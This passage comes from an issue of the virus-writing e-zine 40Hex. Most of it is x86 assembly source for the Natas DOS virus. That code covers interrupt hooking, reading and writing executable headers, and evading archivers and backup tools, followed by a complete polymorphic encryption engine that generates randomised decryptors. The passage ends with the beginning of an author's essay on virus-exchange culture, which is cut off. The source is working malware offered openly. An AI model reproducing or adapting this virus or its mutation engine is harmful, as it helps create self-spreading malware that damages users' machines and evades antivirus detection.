DS:DX=new address call set_int ; set int to DS:DX cmp al,15h mov al,15h jnb int_2_bios_40 ; CY AL=13h add di,4 jmp int_2_bios_lp int_2_bios_40: mov al,40h je int_2_bios_lp ; ZR AL=15h else AL=40h, exit pop ds dx bx ax retn ;=====( Read/write header to file )==========================================; read_header: mov ah,3fh cmp ax,0 org $ - 2 write_header: mov ah,40h mov dx,offset header header_op: mov cx,18h call call_21_file ; read/write header jc read_write_err sub ax,cx read_write_err: retn ;=====( Unhook int 24h )=====================================================; undo_24: mov al,24h lds dx,cs:int_24 call set_int ; unhook int 24h in al,21h and al,not 2 ; enable keyboard out 21h,al retn ;=====( Save returns after int 21h call )====================================; save_returns: mov ss:[bp.reg_ax],ax pushf pop ss:[bp.reg_f] retn ;=====( Return ZF set if ARJ, PKZIP, LHA or MODEM )==========================; is_specialfile: push ax cx si di es mov al,0 check_special = byte ptr $ - 1 or al,al ; Check for special? jnz it_is_special call get_psp ; get MCB of current PSP mov ax,es:[di] ; get 1st 2 letters of name cmp ax,'RA' ; ARj? je it_is_special cmp ax,'HL' ; LHa? je it_is_special cmp ax,'KP' ; PKzip? je it_is_special mov cx,2 mov si,offset backup is_it_mod_bak: push cx di mov cl,8 lods byte ptr cs:[si] ; get 'B' or 'M' xor al,66h + 6h ; decrypt repne scasb jne is_it_mod cmp cl,3 jb is_it_mod mov cl,4 is_ode_ack: lods byte ptr cs:[si] xor al,66h + 6h jz is_it_mod ; 0 (done)? scasb loope is_ode_ack is_it_mod: mov si,offset modem pop di cx loopne is_it_mod_bak it_is_special: pop es di si cx ax retn backup: db 'B' xor (66h + 6h) db 'A' xor (66h + 6h) db 'C' xor (66h + 6h) db 'K' xor (66h + 6h) db 0 xor (66h + 6h) modem: db 'M' xor (66h + 6h) db 'O' xor (66h + 6h) db 'D' xor (66h + 6h) db 'E' xor (66h + 6h) db 'M' xor (66h + 6h) ;=====( get current PSP segment )============================================; get_psp: push ax bx mov ah,62h call call_21 ; get PSP segment dec bx mov es,bx ; MCB of current program mov di,8h ; offset of file name cld pop bx ax retn ;=====( Get DTA address )====================================================; get_dta: mov ah,2fh call call_21 ; DTA address into ES:BX push es pop ds retn call_dos_13: call swap_13 pushf call cs:dos_13 call swap_13 retn call_disk: test dl,80h ; ZF -> Floppy disk (int 40h) je call_40 call_13: pushf call cs:int_13 retn call_21_file: mov bx,0 handle = word ptr $ - 2 call_21: pushf push cs call go_2_21 retn call_40: pushf call cs:int_40 retn include eng.asm db "Natas",0 even decrypt: mov word ptr ds:[100h],1f0eh ; PUSH CS/POP DS mov byte ptr ds:[102h],0e8h ; CALL jmp file_start org decrypt + 150 header dw 18h / 2 dup(20cdh) file_end: work_header dw 18h / 2 dup(?) write_buff: db encode_end-encode dup(?) int_21_ss dw ? int_21_sp dw ? dw 256 / 2 dup(?) temp_stack: jump_code_13 db 5 dup(?) jump_code_21 db 5 dup(?) int_1 dd ? int_24 dd ? int_13 dd ? dos_13 dd ? int_15 dd ? int_40 dd ? int_21 dd ? new_24: db 3 dup(?) push_pop_ret dw ? pointer dw ? disp dw ? encode_ptr dw ? encode_enc_ptr dw ? key_reg db ? count_reg db ? ptr_reg db ? ptr_reg1 db ? modify_op db ? origin db ? inst_count db ? disk_buff db 512 dup(?) v_end: ;=====( Very useful structures )=============================================; ;=====( Memory Control Block structure )=====================================; mcb struc mcb_sig db ? ; 'Z' or 'M' mcb_owner dw ? ; attribute of owner mcb_size dw ? ; size of mcb block mcb_name db 8 dup(?) ; file name of owner mcb ends ;=====( For functions 11h and 12h )==========================================; Directory STRUC DS_Drive db ? DS_Name db 8 dup(0) DS_Ext db 3 dup(0) DS_Attr db ? DS_Reserved db 10 dup(0) DS_Time dw ? DS_Date dw ? DS_Start_Clust dw ? DS_Size dd ? Directory ENDS ;=====( for functions 4eh and 4fh )==========================================; DTA STRUC DTA_Reserved db 21 dup(0) DTA_Attr db ? DTA_Time dw ? DTA_Date dw ? DTA_Size dd ? DTA_Name db 13 dup(0) DTA ENDS Exe_Header STRUC EH_Signature dw ? ; Set to 'MZ' or 'ZM' for .exe files EH_Modulo dw ? ; remainder of file size/512 EH_Size dw ? ; file size/512 EH_Reloc dw ? ; Number of relocation items EH_Size_Header dw ? ; Size of header in paragraphs EH_Min_Mem dw ? ; Minimum paragraphs needed by file EH_Max_Mem dw ? ; Maximum paragraphs needed by file EH_SS dw ? ; Stack segment displacement EH_SP dw ? ; Stack Pointer EH_Checksum dw ? ; Checksum, not used EH_IP dw ? ; Instruction Pointer of Exe file EH_CS dw ? ; Code segment displacement of .exe eh_1st_reloc dw ? ; first relocation item eh_ovl dw ? ; overlay number Exe_Header ENDS Boot_Sector STRUC bs_Jump db 3 dup(?) bs_Oem_Name db 8 dup(?) bs_Bytes_Per_Sector dw ? bs_Sectors_Per_Cluster db ? bs_Reserved_Sectors dw ? bs_FATs db ? ; Number of FATs bs_Root_Dir_Entries dw ? ; Max number of root dir entries bs_Sectors dw ? ; number of sectors; small bs_Media db ? ; Media descriptor byte bs_Sectors_Per_FAT dw ? bs_Sectors_Per_Track dw ? bs_Heads dw ? ; number of heads bs_Hidden_Sectors dd ? bs_Huge_Sectors dd ? ; number of sectors; large bs_Drive_Number db ? bs_Reserved db ? bs_Boot_Signature db ? bs_Volume_ID dd ? bs_Volume_Label db 11 dup(?) bs_File_System_Type db 8 dup(?) Boot_Sector ENDS Partition_Table STRUC pt_Code db 1beh dup(?) ; partition table code pt_Status db ? ; 0=non-bootable 80h=bootable pt_Start_Head db ? pt_Start_Sector_Track dw ? pt_Type db ? ; 1 = DOS 12bit FAT 4 = DOS 16bit FAT pt_End_Head db ? pt_End_Sector_Track dw ? pt_Starting_Abs_Sector dd ? pt_Number_Sectors dd ? Partition_Table ENDS int_1_stack STRUC st_ip dw ? ; offset of next instruction after ; interrupt st_cs dw ? ; segment of next instruction st_flags dw ? ; flags when interrupt was called int_1_stack ENDS ;----------------------------------------------------------------------------; ; Dcb description for DOS 3+ ; ; ; ; Offset Size Description ; ; 00h WORD number of file handles referring to this file ; ; 02h WORD file open mode (see AH=3Dh) ; ; bit 15 set if this file opened via FCB ; ; 04h BYTE file attribute ; ; 05h WORD device info word (see AX=4400h) ; ; 07h DWORD pointer to device driver header if character device ; ; else pointer to DOS Drive Parameter Block (see AH=32h) ; ; 0Bh WORD starting cluster of file ; ; 0Dh WORD file time in packed format (see AX=5700h) ; ; 0Fh WORD file date in packed format (see AX=5700h) ; ; 11h DWORD file size ; ; 15h DWORD current offset in file ; ; 19h WORD relative cluster within file of last cluster accessed ; ; 1Bh WORD absolute cluster number of last cluster accessed ; ; 0000h if file never read or written??? ; ; 1Dh WORD number of sector containing directory entry ; ; 1Fh BYTE number of dir entry within sector (byte offset/32) ; ; 20h 11 BYTEs filename in FCB format (no path/period, blank-padded) ; ; 2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file ; ; 2Fh WORD (SHARE.EXE) network machine number which opened file ; ; 31h WORD PSP segment of file's owner (see AH=26h) ; ; 33h WORD offset within SHARE.EXE code segment of ; ; sharing record (see below) 0000h = none ; ;----------------------------------------------------------------------------; dcb struc dcb_users dw ? dcb_mode dw ? dcb_attr db ? dcb_dev_attr dw ? dcb_drv_addr dd ? dcb_1st_clst dw ? dcb_time dw ? dcb_date dw ? dcb_size dd ? dcb_pos dd ? dcb_last_clst dw ? dcb_current_clst dw ? dcb_dir_sec dw ? dcb_dir_entry db ? dcb_name db 8 dup(?) dcb_ext db 3 dup(?) dcb_useless1 dw ? dcb_useless2 dw ? dcb_useless3 dw ? dcb_psp_seg dw ? dcb_useless4 dw ? dcb ends bpb STRUC bpb_Bytes_Per_Sec dw ? bpb_Sec_Per_Clust db ? bpb_Reserved_Sectors dw ? bpb_FATs db ? ; Number of FATs bpb_Root_Dir_Entries dw ? ; Max number of root dir entries bpb_Sectors dw ? ; number of sectors; small bpb_Media db ? ; Media descriptor byte bpb_Sectors_Per_FAT dw ? bpb_Sectors_Per_Track dw ? bpb_Heads dw ? ; number of heads bpb_Hidden_Sectors dd ? bpb_Huge_Sectors dd ? ; number of sectors; large bpb_Drive_Number db ? bpb_Reserved db ? bpb_Boot_Signature db ? bpb_Volume_ID dd ? bpb_Volume_Label db 11 dup(?) bpb_File_System_Type db 8 dup(?) bpb ENDS register struc reg_es dw ? reg_ds dw ? reg_di dw ? reg_si dw ? reg_bp dw ? reg_dx dw ? reg_cx dw ? reg_bx dw ? reg_ax dw ? reg_f dw ? register ends sys_file struc sys_next dd ? sys_strat dw ? sys_int dw ? sys_file ends end -----------------------------<>--------------------------------------- _ax equ 0 _cx equ 1 _dx equ 2 _bx equ 3 _sp equ 4 _bp equ 5 _si equ 6 _di equ 7 engine: mov ds:pointer,ax ; save IP mov di,offset decrypt mov bx,offset make_count mov cx,offset make_key mov dx,offset make_ptr mov si,offset order_ret or bp,11101111b ; SP is used call order ; randomize and call registers push di ; save start of loop push di mov si,offset encode mov di,offset write_buff mov cx,encode_end-encode rep movsb ; copy write code mov ds:encode_ptr,offset (encode_break-encode)+write_buff pop di mov bx,offset make_enc mov cx,offset make_keychange mov dx,offset make_deccount mov si,offset make_incptr call order ; call routines ;=====( Preform loop )=======================================================; mov ax,2 push ax call random ; test BP for 4000? pop ax jz loop_no_test test bp,4000h ; possible to just "Jcc"? jnz loop_make_jcc loop_no_test: call random jz loop_no_test1 test bp,2000h ; use loop? jnz loop_make_jcc loop_no_test1: or bp,800h ; do not change flags mov ax,2 cwd call random ; try OR/AND/TEST reg,reg ; or XOR/ADD/OR/SUB reg,0? mov al,ds:count_reg ; get counter jnz loop_orandtest call boolean ; do XOR/OR/ADD or ADD/SUB? jnz loop_modify call add_reg ; ADD/SUB reg,0 jmp loop_make_jcc loop_modify: call modify_reg ; XOR/OR/ADD reg,0 jmp loop_make_jcc loop_orandtest: mov cl,3 mov ch,al shl ch,cl or al,ch ; set reg1 as reg2 also mov bx,2 ; OR/AND/TEST call random_bx jnz loop_and or ax,9c0h ; OR reg1, reg2 loop_reverse: call boolean ; use 9 or 11? jnz loop_orandteststo or ah,2h ; reg2, reg1 jmp loop_orandteststo loop_and: dec bx jnz loop_test or ax,21c0h ; AND reg1, reg2 jmp loop_reverse loop_test: or ax,85c0h ; TEST reg1, reg2 loop_orandteststo: xchg al,ah stosw ; store TEST/OR/AND or bp,1800h ; do not change flags/ ; test stored call garble loop_make_jcc: and bp,not 800h test bp,2000h ; code loop? jz loop_make_jump mov al,0e2h ; LOOP test bp,1000h ; possible to use LOOPNZ/Z? jz loop_code_disp call boolean jnz loop_code_disp dec ax ; LOOPZ call boolean jnz loop_iscx dec ax ; LOOPNZ jmp loop_code_disp ;=====( Now make conditional jump )==========================================; jcc_tbl: db 75h,79h,7dh,7fh ; JNE/JNS/JG/JGE loop_make_jump: mov bx,offset jcc_tbl mov ax,3 call random xlat ; get Conditional jump mov bx,2 call random_bx ; use JE/JS/LE/L then JMP? jnz loop_code_disp cmp ds:count_reg,_cx ; CX is counter? jnz loop_notcx mov bl,4 call random_bx jnz loop_notcx mov al,0e3h + 1 ; JCXZ + 1 loop_notcx: dec ax loop_iscx: stosw cmp al,07fh ; Jcxz/loopz? ja loop_code_short call boolean ; Use opposite or EB? jnz loop_code_short or bp,800h ; dont change flags loop_code_short:mov si,di ; save offset of displacement call garble lea ax,ds:[si-2] sub ax,di neg al ; get jump displacement mov ds:[si-1],al ; save it test bp,800h ; Dont change flags -> "Jcc" mov al,0ebh ; Jmp short je loop_code_disp mov ax,3 call random mov bx,offset jcc_tbl xlat ; Get JNE/JNS/JG/JGE loop_code_disp: stosb ; store jump pop ax ; start of loop dec ax sub ax,di ; get loop displacement stosb or bp,11101111b ; free all registers and bp,not 800h ; allow flags to change call garble mov ax,19 call random ; 1 in 20 chance of non-jmp jnz loop_code_jmp mov ax,ds:pointer add ax,offset file_start ; where to jump xchg dx,ax call get_reg ; get a register call mov_reg ; Mov value into register or ax,0ffc0h + (4 shl 3) ; JMP reg16 call boolean ; PUSH/RET or JMP reg16? jnz loop_code_push xchg al,ah jmp loop_code_stosw loop_code_push: mov bx,2 call random_bx ; 1 in 3 chance of FF /6 PUSH jnz loop_code_push1 xor al,(6 shl 3) xor (4 shl 3) ; PUSH reg xchg al,ah stosw jmp loop_code_ret loop_code_push1:xor al,50h xor (0c0h or (4 shl 3)) ; PUSH reg stosb loop_code_ret: call garble mov al,0c3h ; RETN stosb jmp loop_code_end loop_code_jmp: mov al,0e9h stosb ; Store Jump lea ax,ds:[di-((file_start-2)-v_start)] neg ax ; Jmp file_start loop_code_stosw:stosw loop_code_end: mov si,ds:encode_enc_ptr ; get encrypt instruction ptr cmp di,offset header ; Decryptor is too large? jb go_write_buff stc ; return error pushf pop bp retn go_write_buff: jmp write_buff ; encrypt/write/decrypt ;=====( Inc pointer )========================================================; make_incptr: mov ax,word ptr ds:ptr_reg ; get pointer registers mov dx,2 ; ADD ptr,2 cmp ah,-1 ; two registers used? jz make_incptr_1 call boolean ; do one or both? jnz make_incptr_do1 dec dx ; ADD ptr,1 call make_incptr_do1 jmp make_incptr_2 make_incptr_do1:call boolean jnz make_incptr_1 make_incptr_2: xchg al,ah make_incptr_1: call add_reg sub ds:disp,dx ; add to displacement retn ;=====( Dec counter )========================================================; make_deccount: cmp si,offset make_deccount ; last operation? jnz make_deccount_notlast call boolean ; do it? jnz make_deccount_notlast or bp,4800h ; remember we're last make_deccount_notlast: mov al,ds:count_reg cmp al,_cx ; possible to use LOOP/LOOPNZ? jnz make_deccount_notcx call boolean jnz make_deccount_notcx or bp,2000h ; do LOOP jmp make_deccount_exit make_deccount_notcx: mov dx,-1 ; ADD counter,-1 call add_reg make_deccount_exit: or bp,400h ; deccount executed retn ;=====( Make encryption instruction )========================================; make_enc: push bp and bp,not 400h mov al,ds:key_reg push ax ; save key register make_enc_which: mov ax,4 ; ADD/SUB/XOR/ROR/ROL call random mov bx,0105h ; ADD [DI],AX mov cx,1119h ; ADC/SBB mov dx,2905h ; SUB [DI],AX jz make_enc_add dec ax jz make_enc_sub dec ax jnz make_enc_ror mov bh,31h ; XOR mov dx,3105h ; XOR [DI],AX jmp make_enc_sto make_enc_ror: cmp ds:key_reg,_cx ; CX is key? jne make_enc_which or bp,400h ; Put XCHG CX,AX mov bh,0d3h mov dx,0d30dh ; ROL dec ax jz r_make_enc_sto xchg bx,dx ; ROR r_make_enc_sto: mov ds:key_reg,al ; 1 SHL 3 = 08 / D3 08 ; D3 00 = ROL [],CL jmp make_enc_sto make_enc_sub: xchg dh,bh ; SUB - ADD [DI],AX xchg cl,ch ; SBB/ADC make_enc_add: call boolean ; do Carry? jnz make_enc_sto push bx mov bh,ch ; Make it ADC/SBB call clear_carry cmp al,0 org $ - 1 make_enc_sto: push bx test bp,8000h ; EXE file? jz make_enc_com call is_bp_ptr ; is BP a pointer? je make_enc_com mov al,2eh ; CS: call boolean jnz make_enc_cs mov al,36h ; SS: make_enc_cs: stosb ; store segment override make_enc_com: mov al,bh stosb ; store instruction mov ax,word ptr ds:ptr_reg ; get pointer registers cmp ah,-1 ; second reg? je make_enc_xlat add al,ah make_enc_xlat: mov bx,offset rm_tbl xlat ; get r/m call is_bp_ptr ; is BP a pointer? jnz make_enc_nobp inc ah ; is there a second reg? jne make_enc_nobp or al,01000000b ; [BP+xx] make_enc_nobp: mov cx,ds:disp ; get displacement mov bx,6 call random_bx ; allow no displacement? jz make_enc_get_disp jcxz make_enc_sto_rm make_enc_get_disp: or al,01000000b ; 8bit displacement call boolean ; allow 8bit displacement? jnz make_enc_16bit cmp cx,7fh ; 8bit displacement? jbe make_enc_sto_rm cmp cx,-80h jb make_enc_16bit xor ch,ch cmp ax,0 org $ - 2 make_enc_16bit: xor al,11000000b ; 8bit off, 16bit on make_enc_sto_rm:mov ah,ds:key_reg shl ah,1 shl ah,1 shl ah,1 ; from bits 0-2 of AH or al,ah ; to bits 3-5 of AL stosb ; store r/m byte test al,11000000b ; any displacement? jz make_enc_disp test al,10000000b ; 16bit displacement? xchg cx,ax stosw ; store displacement jnz make_enc_disp dec di ; 8bit only make_enc_disp: xchg di,ds:encode_ptr ; get encode ptr test bp,400h ; store XCHG CX,AX? je make_enc_nor mov al,91h ; XCHG CX,AX stosb make_enc_nor: xchg dx,ax xchg al,ah mov ds:encode_enc_ptr,di ; save instruction pointer stosw ; set encryption instruction je make_enc_nor1 mov al,91h ; XCHG CX,AX stosb make_enc_nor1: xchg di,ds:encode_ptr ; restore decrypt ptr pop ax xchg al,ah mov word ptr ds:write_buff[encode_flip-encode],ax ; save opposite operation pop ax mov ds:key_reg,al ; restore key register pop bp retn rm_tbl: db -1,-1,-1,7,-1,6,4,5,-1,0,1,2,3 ; -1's not used ;=====( Change key )=========================================================; make_keychange: call boolean ; change key? jnz make_keychange_yes retn make_keychange_yes: push bp or bp,200h ; let know that keychange mov ax,3 call random ; 1 in 4 chance of modify_reg jnz keychange_other call random_1 xchg dx,ax ; Random value to modify key ; reg by mov al,ds:key_reg call modify_reg ; XOR/ADD/OR keychange_stoop:xchg di,ds:encode_ptr ; get ptr to encode inc di ; CLC mov al,ds:modify_op ; get operation stosb keychange_stodx:xchg dx,ax ; store value/operation keychange_sto: stosw xchg di,ds:encode_ptr ; get decrypt pointer pop bp retn keychange_other:mov al,4 ; ROR/ROL/NOT/NEG/ADD call random jnz keychange_rol mov ax,0d1c0h ; ROR AX,1 keychange_cl: mov bx,2 ; 1 in 3 chance of ,CL call random_bx jnz keychange_nocl cmp ds:count_reg,_cx ; Count is CX? jne keychange_nocl test bp,400h ; Count already decremented? jnz keychange_nocl or ah,2 ; By CL keychange_nocl: xchg al,ah push ax or ah,ds:key_reg ; set key register stosw ; store instruction pop ax xchg di,ds:encode_ptr ; get encode ptr jmp keychange_sto keychange_rol: dec ax jnz keychange_not mov ax,0d1c0h or (1 shl 3) ; ROL AX,1 jmp keychange_cl keychange_not: dec ax jnz keychange_neg mov ax,0f7c0h + (2 shl 3) ; NOT AX jmp keychange_nocl keychange_neg: dec ax jnz keychange_add mov ax,0f7c0h + (3 shl 3) ; NEG AX jmp keychange_nocl keychange_add: call random_1 xchg dx,ax mov al,ds:key_reg ; get key register call add_reg ; ADD reg(ax), value(dx) jmp keychange_stoop ;=====( Build key )==========================================================; make_key: call get_reg ; get register xchg dx,ax call random_1 ; get key mov ds:key,ax ; save key xchg dx,ax mov ds:key_reg,al ; save register call mov_reg ; MOV reg(ax),value(dx) retn ;=====( Build counter )======================================================; make_count: call get_reg ; get register mov ds:count_reg,al ; save register mov dx,(decrypt-v_start)/2 ; # of words to crypt call mov_reg ; mov reg(ax),value(dx) retn ;=====( Build Pointer )======================================================; make_ptr: mov dx,ds:pointer call get_ptr_reg ; get DI/SI/BP/BX mov ds:ptr_reg,al mov ds:ptr_reg1,-1 mov bx,3 call random_bx ; 1 in 4 chance of 2 regs jnz make_ptr_2 cmp al,_si mov bx,11000000b ; DI/SI jb make_ptr_test mov bl,00101000b ; BP/BX make_ptr_test: test bp,bx ; 'other' availible? jz make_ptr_2 make_ptr_again: call get_ptr_reg ; get DI/SI/BP/BX push ax call conv_num ; convert to bit-map number test al,bl ; is it other type? pop ax jnz make_ptr_ok call del_reg ; delete register jmp make_ptr_again make_ptr_ok: mov ds:ptr_reg1,al ; save second register mov bx,-1 call random_bx sub dx,bx ; randomize values xchg bx,dx call mov_reg ; mov reg(ax), value(dx) xchg bx,dx mov al,ds:ptr_reg ; get first reg make_ptr_2: xor bx,bx ; zero displacement call boolean ; use one? jnz make_ptr_nodisp mov bx,-1 call random_bx sub dx,bx ; subtract displacement make_ptr_nodisp:mov ds:disp,bx ; save displacement call mov_reg ; mov reg(ax), value(dx) retn ;=====( Shell for mov_reg1 )=================================================; mov_reg: push bx dx mov bx,4 call random_bx ; 1 in 5 chance of MOV/ADD/SUB jnz mov_reg_call mov bx,-1 call random_bx ; get random # sub dx,bx ; MOV reg, value-random # call mov_reg1 ; do MOV reg, mov dx,bx call add_reg ; Now add difference pop dx bx retn mov_reg_call: pop dx bx ;=====( Mov reg(ax), value(dx) )=============================================; mov_reg1: push ax bx cx dx cbw mov bx,2 call random_bx ; MOV or SUB/XOR ADD/OR/XOR jz mov_reg_other mov bl,2 call random_bx ; 1 in 3 chance of c6/c7 MOV jnz mov_reg_b0 or ax,0c7c0h ; MOV reg,imm call boolean ; Do long MOV or LEA? jnz mov_reg_c7 mov cl,3 shl al,cl ; Reg -> bits 3,4,5 xor ax,(8d00h or 110b) xor 0c700h ; LEA reg,[imm] mov_reg_c7: xchg al,ah stosw ; store it mov_reg_sto: xchg dx,ax stosw ; store value call garble mov_reg_exit: jmp modify_pop mov_reg_b0: or al,0b8h ; MOV reg,imm stosb jmp mov_reg_sto mov_reg_other: push ax mov cl,3 mov ch,al shl ch,cl ; copy reg1 to reg2 or al,ch ; set it call boolean jnz mov_reg_other1 or ah,2 ; reg1, reg2 -> reg2, reg1 mov_reg_other1: call boolean jnz mov_reg_xor or ax,29c0h ; SUB reg, reg call boolean jnz mov_reg_other_sto xor ah,19h xor 29h ; SBB reg, reg call clear_carry ; clear carry flag mov_reg_other_sto: xchg al,ah stosw call garble pop ax call modify_reg ; ADD/OR/XOR reg(ax),value(dx) jmp mov_reg_exit mov_reg_xor: or ax,31c0h ; XOR AX,AX jmp mov_reg_other_sto ;=====( ADD/OR/XOR reg(ax), value(dx) )======================================; modify_reg: push ax bx cx dx cbw mov bx,2 call random_bx mov cx,3500h + (6 shl 3) ; XOR jz modify_reg_cont mov cx,0d00h + (1 shl 3) ; OR dec bx jz modify_reg_cont modify_reg_add: mov cx,0500h ; ADD call boolean ; ADC or ADD? jnz modify_reg_cont mov cx,1500h + (2 shl 3) ; ADC modify_reg_clc: call clear_carry ; Clear carry flag modify_reg_cont:test bp,200h ; keychange executing? jz modify_reg_nosave mov ds:modify_op,ch ; save AX operation modify_reg_nosave: call boolean ; check if AX? jnz modify_reg_noax or al,al ; AX? jnz modify_reg_noax mov al,ch stosb ; store instruction xchg dx,ax modify_sto: stosw ; store value modify_exit: call garble modify_pop: pop dx cx bx ax retn modify_reg_noax:or ax,81c0h or al,cl ; XOR/OR/ADD call boolean ; sign extend? jnz modify_reg_nosign cmp dx,7fh ; possible to sign extend? jbe modify_sign cmp dx,-80h jb modify_reg_nosign modify_sign: or ah,2 ; sign extend modify_reg_nosign: xchg al,ah stosw test al,2 ; sign extended? xchg dx,ax je modify_sto stosb jmp modify_exit ;=====( ADD reg(ax), value(dx) )=============================================; add_reg: push ax bx cx dx cbw mov cx,dx add_loop: mov bx,3 call random_bx ; 1 in 4 chance of ADD/SUB jz add_noinc mov bx,40c0h ; INC reg test bp,200h ; keychange running? jz add_nosave mov ds:modify_op,05h ; ADD AX, add_nosave: cmp cx,3h ; too high to INC? jb add_inc neg cx cmp cx,3h ; too low to DEC? ja add_noinc mov bx,48c0h + (1 shl 3) ; DEC reg test bp,200h jz sub_nosave mov ds:modify_op,2dh ; SUB AX, sub_nosave: inc dx inc cx cmp ax,0 org $ - 2 add_inc: dec dx dec cx push ax mov ax,5 call random ; 1 in 6 chance of FF pop ax push ax jnz add_inc_40 mov ah,0ffh xchg bl,bh xchg al,ah ; AL=ff AH=Reg stosb xchg al,ah add_inc_40: or al,bh ; set DEC/INC stosb pop ax call garble or dx,dx ; all done? jnz add_loop add_reg_exit: jmp modify_pop add_noinc: call boolean ; ADD or SUB? jz sub_reg jmp modify_reg_add sub_reg: test bp,200h ; keychange? jnz sub_reg_key neg dx sub_reg_key: mov cx,2d00h + (5 shl 3) ; SUB call boolean ; use SBB? jz sbb_reg jmp modify_reg_cont sbb_reg: mov cx,1d00h + (3 shl 3) ; SBB jmp modify_reg_clc ;=====( clear carry flag )===================================================; clear_carry: push ax bp or bp,800h ; don't change flags mov al,0f8h ; CLC call boolean jnz clear_carry_clc mov ax,0f5f9h ; STC/CMC stosb call garble xchg al,ah clear_carry_clc:stosb call garble pop bp ax retn garble: push ax mov ax,2 call random ; how many times to call? xchg cx,ax jcxz garble_exit garble_loop: call garble1 loop garble_loop garble_exit: xchg cx,ax pop ax retn ;=====( add garbage code )===================================================; garble1: push ax bx cx dx bp test bp,100h ; Garble already executing? jnz garble_ret and bp,not 200h ; keychange not executing or bp,100h ; Garble executing call boolean jnz garble_ret mov cl,3 call random_1 xchg dx,ax ; DX=random number call get_reg ; get register jc garble_ret mov bx,6 test bp,800h ; flag change allowed? jz garble_f mov bl,2 garble_f: call random_bx ; MOV/1BYTE/XCHG/MODIFY/ADD/MOV? jnz garble_xchg or ah,89h garble_reg_set: call boolean ; reg1, reg2 or reg2, reg1? jz garble_reg_reg or ah,2 ; 8b xchg al,dl garble_reg_reg: and dl,7 ; Get register values only and al,7 shl dl,cl or al,0c0h ; MOV reg1, random reg or al,dl xchg al,ah stosw garble_ret: pop bp jmp modify_pop garble_xchg: dec bx jnz garble_1byte xchg dx,ax call get_reg ; get another reg jc garble_ret xchg dx,ax ; AL=reg1 DL=reg2 call boolean jnz garble_xchgnoax or dl,dl ; AX? jz garble_xchgax or al,al jz garble_xchgax garble_xchgnoax:or ah,87h ; XCHG reg1, jmp garble_reg_reg garble_xchgax: or al,90h or al,dl ; XCHG AX, reg garble_stosb: stosb jmp garble_ret garble_1byte: dec bx jnz garble_modify mov al,4 call random mov bx,offset garble_1byte_tbl xlat ; get 1 byte instruction jmp garble_stosb garble_modify: dec bx jnz garble_add call modify_reg ; ADD/XOR/OR reg1, random # jmp garble_ret garble_add: dec bx jnz garble_mov call add_reg ; ADD/SUB reg1, random # jmp garble_ret garble_mov: dec bx jnz garble_op call mov_reg ; MOV reg1, random # jmp garble_ret garble_op: and dh,00111000b ; get rnd op mov ah,1 or ah,dh jmp garble_reg_set garble_1byte_tbl: db 2eh db 36h cld std sti ;=====( Is BP a Pointer? )===================================================; is_bp_ptr: cmp ds:ptr_reg,_bp je bp_is_ptr cmp ds:ptr_reg1,_bp bp_is_ptr: retn ;=====( Get pointer register (DI/SI/BP/BX) )=================================; get_ptr_regnext:call del_reg ; restore register to pool get_ptr_reg: call get_reg ; get register cmp al,_bx je got_ptr_reg cmp al,_bp jb get_ptr_regnext got_ptr_reg: retn ;=====( return random register in AL )=======================================; get_reg: test bp,11101111b ; any registers free? stc jz get_reg_exit get_reg_loop: mov ax,7 call random push ax cbw call conv_num ; convert to bit map test bp,ax ; is register free? pushf not ax and bp,ax ; mark register popf pop ax jz get_reg_loop get_reg_exit: retn ;=====( Restore register to pool )===========================================; del_reg: push ax cbw call conv_num ; convert to bit number or bp,ax ; restore register pop ax retn ;=====( convert number to bit map )==========================================; conv_num: push cx mov cl,al mov al,1 shl al,cl pop cx retn ;=====( randomize order of BX/CX/DX/SI, then call )==========================; order: call garble mov ax,2 call random xchg cx,ax inc cx order_loop: call boolean jnz order1 xchg bx,ax order1: call boolean jnz order2 xchg dx,ax order2: call boolean jnz order3 xchg si,ax order3: loop order_loop push si dx bx ax order_ret: retn ;=====( return random number between 0 and ffff in bx )======================; random_bx: xchg bx,ax call random xchg bx,ax retn ;=====( flip Sign bit )======================================================; boolean: push ax mov ax,1 call random pop ax retn ;=====( return random number between 0 and ffff )============================; random_1: mov ax,-1 ;=====( Generate random number between 0 and AX )============================; random: push ds bx cx dx ax xor ax,ax int 1ah push cs pop ds in al,40h xchg cx,ax xchg dx,ax mov bx,offset ran_num xor ds:[bx],ax rol word ptr ds:[bx],cl xor cx,ds:[bx] rol ax,cl xor dx,ds:[bx] ror dx,cl xor ax,dx imul dx xor ax,dx xor ds:[bx],ax pop cx xor dx,dx inc cx je random_ret div cx xchg ax,dx random_ret: pop dx cx bx ds or ax,ax retn ran_num dw ? ;=====( Encrypts the code/writes it/decrypts code )==========================; encode: mov bx,ds:handle mov ax,0 key = word ptr $ - 2 mov cx,(decrypt-v_start)/2 xor di,di encode_break: clc clc clc clc ; XCHG CX,AX XCHG CX,AX clc clc ; CLC ADD AX,xxxx / XOR [DI],AX clc clc ; XOR [DI],AX / CLC ADD AX,xxxx inc di inc di loop encode_break encode_ret = byte ptr $ mov ah,40h mov cx,file_size cwd pushf call cs:int_21 jc encode_flag sub ax,cx encode_flag: pushf pop bp mov word ptr ds:[si],0 encode_flip = word ptr $ - 2 mov byte ptr ds:write_buff[encode_ret-encode],0c3h jmp encode encode_end: 40Hex Number 12 Volume 3 Issue 3 File 006 This article is being written for 40-hex, because I believe communication is the key to helping computing obtain its maximum potential. I do not agree with all of the philosophies of many virus writers. This article does not endorse the views of anyone other than myself :), and does not endorse any other material that will appear in this or any other issue of 40-hex. Many of the ideas expressed in this article appeared in one of my submissions to Computer Underground Digest. I'm writing this because I've had some good honest conversations with some of the Phalcon/Skism people, and I appreciate them listening to my views (even though they don't agree with them all). Again, I am not going to get into this "not all viruses are meant to be destructive, not everyone who calls a virus exchange BBS will use viruses for evil purposes, some anti-virus product developers lie to scare the users" business. I agree with all of this, and if you don't, then you will have to find that out for yourself. Virus writers already know this is true. If you are not a virus writer, and really don't know what is going on, and are reading this magazine thinking that we need laws to shut these guys down, you should do some investigation on your own and find out what is really going on in the virus arena. These arguments only cloud the issues, and the issue here is "What is going on?". I can't tell you everything that is going on because I don't know, but I tell you this much: Something's happening here....What it is ain't exactly clear... Computer viruses are programs but they are also more than 'just programs'. I did an in-depth study of virus exchange BBS and found that the viruses themselves did not have a signifant impact on the users. It was more a case of certain attitudes having impact, and of the (necessary) reaction on the part of security personnel and a-v product developers having impact. By necessary action, I mean that each time a virus writer releases a virus to a virus exchange BBS (losing control over it) or releases it code in a magazine, people get scared. Developers then have to put detection for that virus in their scanners. Updates cost money. Some of this has changed since my study. More viruses are being found in the wild. Some of this is due to their intentional release, their availability on virus exchange BBS. Still, the majority of 